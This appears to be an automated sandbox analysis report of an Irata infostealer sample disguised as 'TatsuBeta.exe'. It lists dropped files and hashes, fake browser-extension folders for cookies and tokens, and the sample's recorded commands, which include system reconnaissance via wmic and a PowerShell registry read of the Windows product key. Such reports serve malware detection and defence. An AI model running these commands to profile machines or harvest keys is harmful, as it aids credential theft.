memory/7336-671-0x00007FFE217C0000-0x00007FFE22282000-memory.dmp

memory/7336-685-0x00007FFE217C0000-0x00007FFE22282000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\7fqbfx32.default-release\places.sqlite_tmp

MD5 1a64774706e100f2efb6110d840f1e3e
SHA1 c16bfda68a107ee360c5613eb7d01176e7d43b62
SHA256 efc923d46ad626a1111b5bd8ce3af2945a6fe64d3a3e1d5a2eb40f172d450ae5
SHA512 18d3eff7cb44c368b25aedc68cfb173d38fac721bc9d5d859f53781ed9cd62a59fa087b62da5794091e094b956fbd6e00dfbbb1a35b938a583d7435d7b234f41

memory/7920-737-0x00000248C3250000-0x00000248C3260000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 8d931fe6587bd2b66a26d6a35be61477
SHA1 53131424c0190c3408e0de399dcffff0d574ac2a
SHA256 b65516f12b061a0cc8e629bd86801ab0e5c41cb40200c48e4ff04423d8fc103f
SHA512 178e372d49078dd555787a678b349783165dd7ae821fc7f537f1795595b9acd6d7cf1262dca0b2273a207c35ba0245c8d37229d5936df2020bebbcd39353e9b4

memory/7920-736-0x00000248C3250000-0x00000248C3260000-memory.dmp

memory/7920-747-0x00000248C3250000-0x00000248C3260000-memory.dmp

memory/7920-735-0x00007FFE217C0000-0x00007FFE22282000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_mz5vxz.vbs

MD5 3aad606368459c6a4f9749ba56a5fdac
SHA1 692e58a02396fdf2475b7697c9e7244046060e6a
SHA256 b84d6fe917986f1fdcbbe58e720fe762761d670750ff3bcffea55faa7119356d
SHA512 70c5c7b1e9e099c7e8eaf4a11e89269f89f17a9d7af85359f7df07541fe6646868eec1abfc00fb36e0542df352be5a52075ceabd1c029d613818da3508adf482

memory/7920-750-0x00007FFE217C0000-0x00007FFE22282000-memory.dmp

memory/6156-786-0x00007FFE217C0000-0x00007FFE22282000-memory.dmp

memory/6156-796-0x0000024C7CF90000-0x0000024C7CFA0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 fc723caf6cf038111c14b53bf9a60852
SHA1 a09e2b2e7622cbadc73b7bbc618ebd1883ab129f
SHA256 476ed7fa0c03ae9607123ce3898af77684efbe121413df027baf69204e9c3747
SHA512 d56cf82dff1557f9cf65aebc50019148925af612e8ff565622104a76bdb28b8a6106f42a19295f26206ff8dd60fd0ec1e0cc824fac9442c55ce9f671eeeb46f1

C:\Users\Admin\AppData\Roaming\salutZaMVP.ps1

MD5 4fdddf586aed433adb0bfe7362592055
SHA1 a0e31dcb709ccd9e7078529880c66611d7f418ea
SHA256 4e26e8214c7ebcb5afa23bc8f5e545dd9c8a782a7ee1d3d40531cf4ee09fbac0
SHA512 99c4fe58658e487fa54d82d1c041c2af5efdafc98dc1e079d3a250b973a435aef488e334849a0e052f6b99546df6d6518cf43b4d606edf5fc637169000ae2362

C:\ProgramData\ChromeExtensionsNova\extension-cookies\manifest.json

MD5 04c23766134b234e85cc537b2162efb1
SHA1 45c48d9ca30a4580a682f025cc66331e49f6f158
SHA256 f50f62683347bbca52d7f7de0c877014ae77043753905628644e2d485dfb4900
SHA512 d246f59ad6d6e9fc8d8d88129302d55cb3d2ba7d52496915ee6791fa0576153070af76ea689cc74ccefc36456df749ac5c8f45cb12702961470f202078bfcb3c

C:\ProgramData\ChromeExtensionsNova\extension-tokens\images\logo48.png

MD5 9f74f11972c3c0b161832ffab541bf31
SHA1 e5841ba20a229cdeab85d30690509e649e848271
SHA256 8b74a0abdd566ffdf15891d6abd3537bffb0abce7f362c737c3de6752e136032
SHA512 b90f13eb65a4dcfdd596a7d9eba7c1ba5eb1a598e51107ce3dca07c0a0025469ab18c9958eff2b36f7e05a23f0d16d7d9d7c2321b8e1f2a456aaa7bec3ced0e8

C:\ProgramData\ChromeExtensionsNova\extension-tokens\images\logo16.png

MD5 192e90432fed0081abb25295d8f309c4
SHA1 5150e93061f39e26688afd60a04c0ab14b510d47
SHA256 3216d6864b4f8824b82eb887edf95436dac3bea3f7d43d8988a176e3f1f8e1b2
SHA512 9b9b3f85eb9f12ad1b4c8cfc5e672758d879e178179deb28e80e6c3b27871261bf6b52f9066850b5a7a2fd85012b5308eaf3dda882fa40febc9cf6b47f1a4f04

C:\ProgramData\ChromeExtensionsNova\extension-tokens\manifest.json

MD5 42ac88deb5c3cfc02fdc1c27319ee067
SHA1 97b1addf35159800b90743fcfbb5505e80f6eb82
SHA256 28486361faff1827fb9f1871529c48efaaf86027592d189afa6f99b14eb3f4bb
SHA512 77c4054a3cf061eb6f4f6e9803b74833a8fb0fe352239b5b47cf39ea5eea8104b9da6deab75018557476fbda856f3be8d57e6fe2eb777c45a7a1bdb1e72d02d5

C:\ProgramData\ChromeExtensionsNova\extension-tokens\js\jquery-3.5.1.min.js

MD5 a8bc72c0f96561ca140e385d7fd8c1cd
SHA1 eee422e608b8e7378bcf0f71225aeffce1f8281a
SHA256 f5662912bc54b8be215212057ef671c6a66518f0716f52a7e231610d83cc0942
SHA512 7c5526572bee715cc570b3f2c8729c080bbf5a7907b9154e8fae78d9ccb870634b39e9c9ea758f3dd8fe07db5bdd7372d0b6c0b2ce213bfa980c1d22a034744e

C:\ProgramData\ChromeExtensionsNova\extension-tokens\images\logo128.png

MD5 271847949971c396f77beaab936b7ea2
SHA1 b32c5a7eec49aa07f8ae73feb990626010c4b850
SHA256 a55224cdf06a5c2b937ba400604501f8b6ec93bc2c1cff62aa2fd378d504c657
SHA512 a2e141f68143f370e2b82a1c9c7c4b1c5f6fc2cfc2ad94acb8c5c02237af56f83904beaff3240e20397f0edbdfadf8779c0bd54b2cf0c9899fef59343e31794a

C:\ProgramData\ChromeExtensionsNova\extension-tokens\images\logo.png

MD5 1caac0843a32a5a18b3820d12f383519
SHA1 5da6d2af7dbd2857c2a457bf413db60b5dcb09eb
SHA256 07ec4f6d147d56ca7c2781394b03f4607a5a33427aac50a0e30ac9162b91e982
SHA512 133b7e0f2326912db0d8f76eb3bc1afb4fc9d4a68369849bb68134ff8ed0856b0a87ed83b45d1e54cec18b43b043242639b3b35e639006874c0885145d346c4a

memory/6156-800-0x00007FFE217C0000-0x00007FFE22282000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe

MD5 334b8f543c5c596bbcef7865eca76302
SHA1 c6e589f38edadcb0a7104bd62797e396d3aafb4e
SHA256 7f7b55c36005bd13f46512166fcf958f79f7e669112871ac7d7c0ae5a878bb35
SHA512 9549b2516682ed75000aca54bde48bedb3ceff51376ef20d03f71ff8789eb2f518445ebc2abd84dfd6e47279396214d2ec722401c148da147d6b42370e8b3d0e

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\ffmpeg.dll

MD5 6a261eab9ea7422fd0877d4993ab0255
SHA1 b1dd12ad93a6542086ad888859194065909994ff
SHA256 523433ffaf02654931d011739cb0cf02b6557b51b347607890f538ecf046a527
SHA512 4308befef08d654b908da20eaacb858ccc0c7a885a685dcdd0f2a7356bf36cd7ea5cc1cd2a63786537477b1baadcb52290a4fe509cda8a4d629ecb9ff23d6273

memory/2484-898-0x00000192FE890000-0x00000192FE891000-memory.dmp

memory/2484-899-0x00000192FE890000-0x00000192FE891000-memory.dmp

memory/2484-897-0x00000192FE890000-0x00000192FE891000-memory.dmp

memory/2484-905-0x00000192FE890000-0x00000192FE891000-memory.dmp

memory/2484-906-0x00000192FE890000-0x00000192FE891000-memory.dmp

memory/2484-909-0x00000192FE890000-0x00000192FE891000-memory.dmp

memory/2484-908-0x00000192FE890000-0x00000192FE891000-memory.dmp

memory/2484-907-0x00000192FE890000-0x00000192FE891000-memory.dmp

memory/2484-904-0x00000192FE890000-0x00000192FE891000-memory.dmp

memory/2484-903-0x00000192FE890000-0x00000192FE891000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2023-12-17 13:47

Reported

2023-12-17 13:51

Platform

win7-20231215-en

Max time kernel

23s

Max time network

161s

Command Line

"C:\Users\Admin\AppData\Local\Temp\TatsuBeta.exe"

Signatures

Irata

trojan infostealer rat irata

Irata payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A

Enumerates physical storage devices

Collects information from the system

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\TatsuBeta.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\TatsuBeta.exe

"C:\Users\Admin\AppData\Local\Temp\TatsuBeta.exe"

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe

"C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\script" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1004 --field-trial-handle=1200,2719199173811873226,18332833971545649604,131072 --disable-features=PlzServiceWorker,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=1732 get ExecutablePath"

C:\Windows\System32\Wbem\WMIC.exe

wmic process where processid=1732 get ExecutablePath

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\resources\app.asar.unpacked\bind\main.exe"

C:\Windows\system32\net.exe

net session

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 session

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "net session"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe

"C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\script" --mojo-platform-channel-handle=1636 --field-trial-handle=1200,2719199173811873226,18332833971545649604,131072 --disable-features=PlzServiceWorker,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe

"C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\script" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1612 --field-trial-handle=1200,2719199173811873226,18332833971545649604,131072 --disable-features=PlzServiceWorker,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic OS get caption, osarchitecture | more +1"

C:\Windows\System32\Wbem\WMIC.exe

wmic logicaldisk get size

C:\Windows\System32\Wbem\WMIC.exe

wmic OS get caption, osarchitecture

C:\Windows\System32\Wbem\WMIC.exe

wmic computersystem get totalphysicalmemory

C:\Windows\system32\more.com

more +1

C:\Windows\system32\more.com

more +1

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "echo %NUMBER_OF_PROCESSORS%"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic computersystem get totalphysicalmemory | more +1"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic logicaldisk get size"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get name | more +1"

C:\Windows\system32\more.com

more +1

C:\Windows\System32\Wbem\WMIC.exe

wmic cpu get name

C:\Windows\system32\more.com

more +1

C:\Windows\System32\Wbem\WMIC.exe

wmic PATH Win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController get name | more +1"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

Network

Country Destination Domain Proto
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 ipinfo.io udp
GB 142.250.200.4:80 www.google.com tcp
US 34.117.186.192:443 ipinfo.io tcp
US 34.117.186.192:443 ipinfo.io tcp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:443 dns.google tcp

Files

\Users\Admin\AppData\Local\Temp\nsdA2F4.tmp\System.dll

MD5 0d7ad4f45dc6f5aa87f606d0331c6901
SHA1 48df0911f0484cbe2a8cdd5362140b63c41ee457
SHA256 3eb38ae99653a7dbc724132ee240f6e5c4af4bfe7c01d31d23faf373f9f2eaca
SHA512 c07de7308cb54205e8bd703001a7fe4fd7796c9ac1b4bb330c77c872bf712b093645f40b80ce7127531fe6746a5b66e18ea073ab6a644934abed9bb64126fea9

\Users\Admin\AppData\Local\Temp\nsdA2F4.tmp\nsis7z.dll

MD5 80e44ce4895304c6a3a831310fbf8cd0
SHA1 36bd49ae21c460be5753a904b4501f1abca53508
SHA256 b393f05e8ff919ef071181050e1873c9a776e1a0ae8329aefff7007d0cadf592
SHA512 c8ba7b1f9113ead23e993e74a48c4427ae3562c1f6d9910b2bbe6806c9107cf7d94bc7d204613e4743d0cd869e00dafd4fb54aad1e8adb69c553f3b9e5bc64df

C:\Users\Admin\AppData\Local\Temp\nsdA2F4.tmp\7z-out\chrome_100_percent.pak

MD5 9c1b859b611600201ccf898f1eff2476
SHA1 87d5d9a5fcc2496b48bb084fdf04331823dd1699
SHA256 53102833760a725241841312de452c45e43edd60a122546105ab4020ccef591b
SHA512 1a8ec288e53b9d7e43d018995abe4e3d9c83d329d0561fbb7d022e8b79ffecf033e995b9bc6af352a71c646a1e8afba4addb54deab7455f24b7a279a3dd7c336

C:\Users\Admin\AppData\Local\Temp\nsdA2F4.tmp\7z-out\chrome_200_percent.pak

MD5 b51a78961b1dbb156343e6e024093d41
SHA1 51298bfe945a9645311169fc5bb64a2a1f20bc38
SHA256 4a438f0e209ac62ffa2c14036efdd5474b5ecaa7cbf54110f2e6153abdfb8be9
SHA512 23dedde25ad9cb5829d4b6092a815712788698c2a5a0aefb4299675d39f8b5e2844eabd1ea42332a0408bd234548f5af628e7e365ab26f3385ebfa158cdd921d

C:\Users\Admin\AppData\Local\Temp\nsdA2F4.tmp\7z-out\d3dcompiler_47.dll

MD5 7641e39b7da4077084d2afe7c31032e0
SHA1 2256644f69435ff2fee76deb04d918083960d1eb
SHA256 44422e6936dc72b7ac5ed16bb8bcae164b7554513e52efb66a3e942cec328a47
SHA512 8010e1cb17fa18bbf72d8344e1d63ded7cef7be6e7c13434fa6d8e22ce1d58a4d426959bdcb031502d4b145e29cb111af929fcbc66001111fbc6d7a19e8800a5

C:\Users\Admin\AppData\Local\Temp\nsdA2F4.tmp\7z-out\ffmpeg.dll

MD5 c3842fb3087cdcdb04020ac38683c289
SHA1 329dbcd4a1c79b891b200f11eb50194b85c493bc
SHA256 e79792af338d61424bac87a19c6f34f3b4bc1382345633b8d509253a0a6c2133
SHA512 069196b8006e908954e7ab16131a0d10889a0f7517eaab2423a82fe49fb9b045c0d95dbf7c08c10ddf1a21983aea4a0d207decf91baacff0884511589a57dec5

C:\Users\Admin\AppData\Local\Temp\nsdA2F4.tmp\7z-out\icudtl.dat

MD5 8a87f6bfc49ec8513aaa6405fd37abda
SHA1 ff409dcea28da64d6e4c333d951d379abd96ebbe
SHA256 b1921aec750f231fc142bada238f6d19e59a8ab389c5862fc523f487f1ab9e32
SHA512 21a2288e9df166225ff0f5c042a80e88b37931648598c7878f3132305312bbe7971bfdcee33bae2c6f6c14af67602d0a2352b2fa429c621c211efdd8d6647d2e

C:\Users\Admin\AppData\Local\Temp\nsdA2F4.tmp\7z-out\libEGL.dll

MD5 8352fd22f09b873193cabc2932be92f0
SHA1 5bd2b58854b279f1733c5f54ea2669ee8a888d9e
SHA256 14a4aaa010be14762edfee01fd1f6b9943471eb7a2f9011a2b5c230461cd129c
SHA512 7281e980f2e82f1cc8173d9f8387a97f6e23ec5099ed8dca02222c4e17fa4cfef59d6aa300b1cf06d502bdcf77d9a6dbb08ad6658ae0a28ae6f9f995109da0d2

C:\Users\Admin\AppData\Local\Temp\nsdA2F4.tmp\7z-out\libGLESv2.dll

MD5 c0a0cab819afdf4b3ad5f6069f56b404
SHA1 f90364dfdd434054fc3773e913d29894aa78db48
SHA256 69d2d5eb03d6825fa9698ce4d0320c2b010dc348539b2d1ca17e2a7ad672130c
SHA512 9a539b2442cb985f202de9cdd06b784261f28cb55d548d8e59e7038e26a2d7a9a6d12cde30bac8fc73b711916e70301476d645d0144e1cd5d4f0d65db436a679

C:\Users\Admin\AppData\Local\Temp\nsdA2F4.tmp\7z-out\LICENSE.electron.txt

MD5 4d42118d35941e0f664dddbd83f633c5
SHA1 2b21ec5f20fe961d15f2b58efb1368e66d202e5c
SHA256 5154e165bd6c2cc0cfbcd8916498c7abab0497923bafcd5cb07673fe8480087d
SHA512 3ffbba2e4cd689f362378f6b0f6060571f57e228d3755bdd308283be6cbbef8c2e84beb5fcf73e0c3c81cd944d01ee3fcf141733c4d8b3b0162e543e0b9f3e63

C:\Users\Admin\AppData\Local\Temp\nsdA2F4.tmp\7z-out\LICENSES.chromium.html

MD5 f1940fb0153ed819a66abf2453a0defa
SHA1 3055094be040bf9ec75ed2cffa487feb04f3b2d5
SHA256 ee36130a2bbf57a9173e9b0afa8b909a7e6d90f192019e4e06d1293c25c9bb89
SHA512 98d08599213929cf7f5c525f42bef0dc7a04b570cae28fe3eb3abb9831c5c3a385e0afc3d928c0605fbf3ac0bf9e46c8e095ef7fce989bb127c59b2994523b15

C:\Users\Admin\AppData\Local\Temp\nsdA2F4.tmp\7z-out\resources.pak

MD5 0e8e563c65c4a32ce1a3bccb0d7e877e
SHA1 ccae91fbd73b6033ca3de8021310bd2d0f9e6244
SHA256 229bfd4a70a04430c02b7b343959c907f3c6b3bff1113ea0e32c261a6446a636
SHA512 a19083a3c4d6830c9ad99e1b9da0ac1dc02dd6d9a75904bcc6683665f53f9c718d276c29e462af7633776156e23f014e329e81a1d5a353cd7575066fe27ee69f

C:\Users\Admin\AppData\Local\Temp\nsdA2F4.tmp\7z-out\snapshot_blob.bin

MD5 c9ab741bbef53fa0e84952b8891a5f5a
SHA1 e2dcb8d034e07243537c86371de0c52bce62cee1
SHA256 4d82fe1e642fe3ca7ad1a173f806088c0652ecfe9f0f6f6e246066e15a3431d4
SHA512 177b98a3090ecfe4b4598dfcd7e8b3ca49efafba4dbd8d6c6d0def462de47c3fabfde831725622783ddc177de982de6115178d9bd9830d918bb544a5a4c27fc9

C:\Users\Admin\AppData\Local\Temp\nsdA2F4.tmp\7z-out\v8_context_snapshot.bin

MD5 47014c0f81bad6d216c617c9c63bf040
SHA1 7bb483fdc5fed3c6ed437d9fe6e5023bc38201bf
SHA256 e1249d05bfc73c645b27d269f47b6923b33a3cf8088a8ca78b3b637c90f58178
SHA512 052d86cf3305a9e493bd2472e6b7ddab5e0291efd6d899984a79bae46e5fa4bd21157e19ab4a2591c9cff9069de568bad18c7baf4f35d117c77134e635466f87

C:\Users\Admin\AppData\Local\Temp\nsdA2F4.tmp\7z-out\vulkan-1.dll

MD5 b91586bd80e057a7f62bdc4422744812
SHA1 a1df644421ece2e740e5bf0ed98b4f269fd85c39
SHA256 8ba72d98e0f78b77bda7816cd7232809d287310d34e0f1d7472b9d5fda2c6d02
SHA512 94f0a8e3e75e4803891c0fcb257052dbe0e7399772fc7a46ab802629f76ee580ed30b3678fa6bc3744c12cf9f3103bbc8276e88f6711278748148e9fbeef2053

C:\Users\Admin\AppData\Local\Temp\nsdA2F4.tmp\7z-out\vk_swiftshader_icd.json

MD5 8642dd3a87e2de6e991fae08458e302b
SHA1 9c06735c31cec00600fd763a92f8112d085bd12a
SHA256 32d83ff113fef532a9f97e0d2831f8656628ab1c99e9060f0332b1532839afd9
SHA512 f5d37d1b45b006161e4cefeebba1e33af879a3a51d16ee3ff8c3968c0c36bbafae379bf9124c13310b77774c9cbb4fa53114e83f5b48b5314132736e5bb4496f

C:\Users\Admin\AppData\Local\Temp\nsdA2F4.tmp\7z-out\vk_swiftshader.dll

MD5 bd6933ea463e8fa3a4e44417d7674452
SHA1 c76d986fd2b0b3f67656d1385fa7453ea225ffc9
SHA256 5be48b77c6bdadf1df332e2725b376b4d639ad15422b1d0dcc71c53c9cfc580d
SHA512 73506d71e648b16c1ca1b5360b263e8afe4136f15b3a5b25fb342d93ebfe910f1654a24abc3f2437e8b28f145b015f5676712cd4913c6d1ebb746f5d51f5799e

C:\Users\Admin\AppData\Local\Temp\nsdA2F4.tmp\7z-out\TatsuBeta.exe

MD5 5eb1a9220fe996c234032e70a840b7c9
SHA1 881bb32ee4477ae0282eff8ea029ad614ed64994
SHA256 e62e1d4221690ed0ed9d13c328e899dac91827be79d6028fa88b493546f698bb
SHA512 42cbad645c10bdb007c3b4c8eccd74820b4a6a8b626f27e20fd888ffd9de1e5f57e6f1b721710584875e020de4e28c1da592816aacf7296dbc7a89bc06679e29

C:\Users\Admin\AppData\Local\Temp\nsdA2F4.tmp\7z-out\locales\ar.pak

MD5 6f3e791b4d35ee7d9515614d128752cf
SHA1 181ec3a84fb3e89336d77f24f562a2cbe07619d8
SHA256 e9df0fa338b763a3926c4ee3a87bedf650fa618b6fcf0560c3f5ffe891d48c60
SHA512 3657e610d13a2c938558ec320c298dd490c9e4895ccd304f738aaa2f050373efd7382ca402365f93d23ed488bae82de2d859da788dc8faa8e621346a278f4441

C:\Users\Admin\AppData\Local\Temp\nsdA2F4.tmp\7z-out\locales\ca.pak

MD5 423651c45566cd90ea5edd8631e823b8
SHA1 13bed4173a08bcbfefba034aada3d838eece6d16
SHA256 7a39af99d55a1ea838d8d78c5f0da3e1402f9404d32255e31b676ceed4f0e414
SHA512 e09085023beaa37e9d5f7fdf3c32d0c001672b85e2826f0aba9a662ce958ac93cac17bf63495a604e47cb407b1593049388a4bf1b22b2339ead84a206a10569f

C:\Users\Admin\AppData\Local\Temp\nsdA2F4.tmp\7z-out\locales\da.pak

MD5 55a8f5883805a65c854d25edb3959209
SHA1 d4b3b6bd2a26cbd021fa931d1f63c9ea64e2c268
SHA256 e190187adcbb5f829d162660968ba598ed17bd11339062ca4d807deec8a27fdb
SHA512 4e1f9e6da32f553cbc8cf162726d7aba9e23e2216d6d05b995cf19fff3aafa05ed08fce29b2f8538d46583366402b8630672e650dfbd46952a611e9db0d8016d

C:\Users\Admin\AppData\Local\Temp\nsdA2F4.tmp\7z-out\locales\cs.pak

MD5 3cfd9dc564cfcc33cc5524711365c376
SHA1 2e5016d2643017f37658262122974429f18625a2
SHA256 8be34e4f8226c1dd4e725711ddd884ef4476560f7863edcf378573dde9db3cee
SHA512 6ee156d2fa3b6f601df28e38968d0eae2812d70b41333348dbecd833d5ee6ff944183f0eecde96be433cf1e98c8ec22d6a6d5af5153145842175ab43c73533ef

C:\Users\Admin\AppData\Local\Temp\nsdA2F4.tmp\7z-out\locales\de.pak

MD5 b73344e5a72fca6f956dbab984c123ba
SHA1 0561073aa40a63a9ce9930dd18b18e12ff139b2b
SHA256 6dda3fa65232ca0bff7314f916942a2aa5d9be73a0b0c7a6d016eb34ea6fff5b
SHA512 e8a12da397369f23c102244b3f18f533ec79afa6978785566056bbfe07b10a21ff4973bf17aa829fff65609363988c033b0e48d4a82c846863377c08d8df009d

C:\Users\Admin\AppData\Local\Temp\nsdA2F4.tmp\7z-out\locales\es-419.pak

MD5 7a85e9ea00ef30eefd728adfa30ed219
SHA1 4d64807e1ad6190aa18a4c9f492ac6ff4018fc24
SHA256 87fcb79a63a65c73931ed376cf60d2e61d080b2246bc7965b942eb8e0cadcc54
SHA512 99bf205a6022d4b3a6a72a013f21078ed695b505ebfcf70e331ffc701c60c7ae65d6c64902bd3deb69ad89ac277306fd9b0efc3dfbb4690ee1e5a25282c22f86

C:\Users\Admin\AppData\Local\Temp\nsdA2F4.tmp\7z-out\locales\fr.pak

MD5 87ab0e2e7e66f91f7657861ebd525944
SHA1 f4cd0ff763212771e6234102ece52fe48d562819
SHA256 d6ffc5bc58c161d1480eb1e42eb38db01a546bd2f2156ef70ac36c240f7959d1
SHA512 f690db5500f0c67f903cd1566cc1b730a3a95de2b594c3a2ef488c619a3beed3b0709b7ae96ea9778d395972637ca65026020a1d59fe9c1b414352016db27cdf

C:\Users\Admin\AppData\Local\Temp\nsdA2F4.tmp\7z-out\locales\kn.pak

MD5 47411e53d4eebd89f890ed4f27614ae4
SHA1 04dff01b5e1a846bba35092a2d75530fa250ca07
SHA256 c7928f46176e3ca722804b95ba9561da84ede91044a453bbae2bbb3224b09d35
SHA512 25d9dec6cfc3bfcb9da2bbba9d29cd9d00eddbe991cc2d2b79007f006c5c58dd4193f8c214006f6a40b06563b3cd675273ddf6d738978a65800e4c3c907387c6

C:\Users\Admin\AppData\Local\Temp\nsdA2F4.tmp\7z-out\locales\pt-PT.pak

MD5 2d480c62e663c6d21f2faa86b22a6981
SHA1 aa2789ee06dbc82a3ed4954a85293e4e5e0f503f
SHA256 24a45ce65c2f75e2b61ccffa703ee92eab8ee960f948c7b4b5b16c045bb2d9c2
SHA512 89a3f08603e499bf5c7bac22981385a4f78b4b5a979f6137231123a27309a1bb43eea2277053184bf1c24cebc4af8169ef5a9c60ce7dc1348064a569cce0c7ec

C:\Users\Admin\AppData\Local\Temp\nsdA2F4.tmp\7z-out\locales\ta.pak

MD5 50a79e7d00cd9baac576c59d525c2754
SHA1 849ef113143aafdab9cf6486a3bd2f48295dfbb9
SHA256 7d51b0c3655bbe27e1abac24059206be175466ce75e70a545a5e567e30d6e26e
SHA512 6d8a7076cbdafca95188172dde06b026a2d8edab352563f9f32e2588de06101ca064ba018737797497479473ea04d6f22d7d1b67d06a7633b8e5fcf3e96bd9a6

C:\Users\Admin\AppData\Local\Temp\nsdA2F4.tmp\7z-out\locales\uk.pak

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Temp\nsdA2F4.tmp\7z-out\locales\zh-TW.pak

MD5 c2c35fcedc3708b5bcadf36587393002
SHA1 31d72402cbd44ceb921cedd806259c2cd14e411f
SHA256 cfe4c2c5eb131fd92e0d11f912714c5a9a048833ef3ffbe32679b3d58da8f8ac
